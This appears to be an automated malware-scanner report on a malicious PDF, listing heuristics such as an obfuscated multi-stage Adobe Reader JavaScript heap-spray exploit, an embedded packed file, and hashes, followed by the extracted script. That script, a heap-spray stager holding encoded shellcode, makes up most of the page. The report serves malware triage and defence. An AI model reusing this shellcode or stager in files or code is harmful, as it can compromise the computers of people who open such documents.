MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. This JavaScript is likely responsible for downloading and executing a second-stage payload, as suggested by the presence of an embedded file artifact named 'k1'. The document's metadata indicates it was created using PScript5.dll, often associated with malicious scripts.
Machine Learning
- Nyx PDF Classifier malicious score 0.9980
Heuristics 7
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAYPDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
k1 |
pdf-embedded-file | PDF EmbeddedFile object 26 at offset 0x1EC1 | 1206312 bytes |
SHA-256: d5005e6ee2e649716afeda73fc5624d60ddac2ec2e3497a03f11116991a6a4e7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 8.00, consistent with packed or encrypted content.
|
|||
javascript_obj0031_000.js |
pdf-javascript-stream | PDF /JS object 31 at offset 0x12B202 | 5553 bytes |
SHA-256: 9029ea2e74558adf2ab160dcd562f29685141d2d5f8325345546e0860ea614a6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
var UHNijmYGB=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = UHNijmYGB("%u\x39\x30\x39\x30%u\x39\x30\x39\x30%u\x39\x30\x39\x30%u\x65\x62\x39\x30%u5\x6518%u5\x6256%u068\x61%u303\x63%u1474%u6\x6266%u49\x630"+
"%u8\x6146%u\x33226%u88\x634%u430\x33%u\x65\x6246%u\x658\x65\x62%u\x66\x66\x653%u\x66\x66\x66\x66"+
"%u4445%u5843%u6544%u6444%u6444%u4d43%u5744%u4941%u5a4e%u5942%u5a4a%u5444"+
"%u5942%u5a4a%u6844%u5942%u6b43%u7844%u584d%u5942%u5a4a%u6c44%u4543%u4a41"+
"%u584d%u4b43%u4943%u6141%u6944%u6444%u6444%u6444%u5849%u6344%u5142%u4d41"+
"%u6c44%u5142%u4e41%u674b%u584b%u7841%u6e43%u6541%u4a41%u7a4a%u5942%u7743"+
"%u474b%u474b%u5942%u7a47%u5844%u5942%u4f43%u4c44%u6343%u6744%u7845%u5942"+
"%u5143%u7a52%u5942%u4143%u4444%u6744%u5441%u6a41%u5044%u5243%u5942%u5044"+
"%u5942%u6744%u5845%u5744%u7641%u5744%u4941%u7541%u5a46%u5642%u4941%u6f43"+
"%u6344%u4841%u4641%u6944%u6744%u7141%u6241%u5945%u584b%u6743%u474b%u4c44"+
"%u6e43%u6841%u5942%u4143%u474b%u6744%u5441%u5947%u5942%u6844%u5043%u5942"+
"%u4143%u7844%u6744%u5441%u5942%u674b%u5942%u6744%u4c41%u5849%u7a4e%u474b"+
"%u7844%u7a43%u4a41%u4e41%u7a47%u5a4e%u6444%u6444%u6444%u6444%u7143%u6444"+
"%u784d%u7a47%u4743%u4b43%u7343%u6444%u674b%u6444%u6444%u7641%u6e43%u5844"+
"%u7641%u6e43%u5343%u7641%u4e43%u7a52%u5744%u6445%u5947%u5942%u5643%u4743"+
"%u5942%u6643%u5844%u5942%u5a45%u6142%u4445%u4446%u4e41%u5a46%u5644%u4a41"+
"%u5644%u4b41%u7842%u7741%u4241%u7741%u4341%u6b41%u5945%u7143%u6444%u784d"+
"%u7a47%u7a4a%u4b43%u7641%u6e43%u4743%u5942%u4e43%u5844%u4943%u7641%u6e43"+
"%u5743%u7641%u4e43%u7844%u5942%u4e43%u7a4a%u4d44%u4e43%u4343%u5142%u6643"+
"%u4343%u6444%u6443%u4446%u7641%u6e43%u5743%u7641%u4e43%u6c44%u4a41%u7846"+
"%u5543%u6a44%u6541%u5142%u6b42%u6742%u6343%u7241%u4542%u7441%u6b44%u5744"+
"%u4341%u5842%u6447%u5443%u6744%u4e41%u6d42%u7742%u7344%u6444%u6743%u7244"+
"%u5a47%u7341%u7444%u416e%u6243%u6e44%u6141%u5a46%u6c44%u5341%u6d43%u584d"+
"%u4942%u6643%u5641%u4a42%u7741%u5842%u6a44%u6541%u4542%u6744%u6844%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6942"+
"%u6942%u6942%u6942%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6f43%u5a47%u7643%u6b43%u4a44"+
"%u5a47%u6343%u5a47%u6444%u6141%u6444%u6444%u6444%u6444%u4643%u5342%u6441"+
"%u6d43%u6444%u6444%u6444%u6141%u5a46%u7741%u7641%u7641%u5942%u5941%u5942"+
"%u5845%u5942%u7741%u5942%u4741%u5142%u4841%u5444%u6141%u5946%u7741%u7641"+
"%u7641%u5744%u6445%u5849%u5643%u5343%u5142%u7a47%u5343%u674b%u5744%u6445"+
"%u4a43%u7641%u6e43%u5343%u7641%u4e43%u474b%u5944%u5242%u6842%u7644%u6444"+
"%u6943%u6541%u5944%u5242%u6942%u7644%u6444%u6c43%u6c41%u7343%u7641%u6444"+
"%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5a52%u4b43%u7343"+
"%u7641%u6444%u6444%u6444%u7641%u4e43%u6844%u5942%u4141%u5942%u7a47%u5a52"+
"%u6744%u4841%u5142%u6141%u6144%u4f41%u6444%u6444%u7641%u6e43%u5a52%u7641"+
"%u4e43%u7444%u7143%u6444%u7143%u6444%u7343%u6444%u416e%u6444%u6444%u7641"+
"%u6e43%u5343%u7641%u4e43%u4444%u7143%u6444%u784d%u7a47%u4743%u4b43%u7143"+
"%u674b%u784d%u7a47%u4f43%u4b43%u7641%u6e43%u5343%u7641%u4e43%u7a52%u7143"+
"%u6444%u7143%u6444%u7343%u7444%u416e%u6444%u6444%u7641%u6e43%u5343%u7641"+
"%u4e43%u4444%u4e43%u7143%u6444%u7343%u5242%u6444%u6444%u6444%u7143%u6644"+
"%u7143%u6444%u7143%u6544%u7343%u6444%u6444%u6444%u5a4a%u784d%u7a47%u7343"+
"%u4b43%u5142%u7a47%u7044%u6144%u6241%u6e44%u5942%u5845%u5942%u7641%u4e43"+
"%u5942%u6541%u7641%u5947%u7044%u6141%u7841%u7641%u7641%u7641%u4643%u5142"+
"%u7141%u7641%u6e43%u6644%u6241%u5a4b%u5849%u7a47%u5743%u7343%u6444%u674b"+
"%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5844%u5942%u7a47"+
"%u4f43%u5849%u7a47%u4343%u6141%u5143%u7741%u7641%u7641%u4e43%u5744%u6445"+
"%u4a43%u784d%u7a47%u7343%u4b43%u5142%u7a47%u4c44%u6144%u6241%u6e44%u5942"+
"%u5845%u4242%u4242%u4e43%u5942%u6541%u7641%u5947%u4c44%u6141%u7841%u7641"+
"%u7641%u7641%u4643%u7143%u6444%u7143%u7641%u7641%u4e43%u674b%u4242%u4242"+
"%u4242%u4e43%u5942%u6541%u5142%u4d41%u5945%u7143%u5845%u6141%u7946%u6444"+
"%u6444%u6444%u5849%u7a47%u7541%u7641%u6e43%u6c44%u6141%u5743%u6444%u6444"+
"%u6444%u5849%u7a47%u5945%u7143%u6444%u784d%u7a47%u7141%u4b43%u7641%u6e43"+
"%u5945%u7641%u6e43%u6c44%u7641%u6e43%u7541%u6141%u6843%u6444%u6444%u6444"+
"%u5942%u7a47%u7141%u6445%u4b41%u674b%u6444%u4541%u4541%u4e43%u5942%u6541"+
"%u5142%u4d41%u7141%u7143%u5845%u6141%u4c43%u6444%u6444%u6444%u5849%u7a47"+
"%u7541%u5942%u5643%u6c44%u5942%u7a47%u6844%u4841%u6941%u7444%u5947%u5942"+
"%u4841%u4b43%u7641%u6e43%u7541%u6141%u5043%u6444%u6444%u6444%u6445%u4b41"+
"%u6c44%u6444%u4541%u4541%u4541%u4e43%u5942%u6541%u4843%u5942%u7a47%u6c44"+
"%u784d%u4b43%u6744%u5942%u7a52%u5142%u4941%u674b%u784d%u5942%u7641%u7741"+
"%u7741%u7741%u5a45%u5a41%u4744%u4241%u5342%u6841%u5242%u5242%u5242%u5242"+
"%u6f43%u4445%u5a45%u4841%u5242%u5242%u6444%u6444%u6e43%u6244%u4841%u4445"+
"%u7444%u5142%u4941%u6644%u5941%u6841%u784b%u4b41%u6447%u6445%u4b41%u674b"+
"%u6444%u7641%u4144%u674b%u4444%u5a4a%u6444%u7641%u4144%u6c44%u4444%u5a4a"+
"%u6444%u7641%u4144%u6444%u4444%u5a4a%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u3030");
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.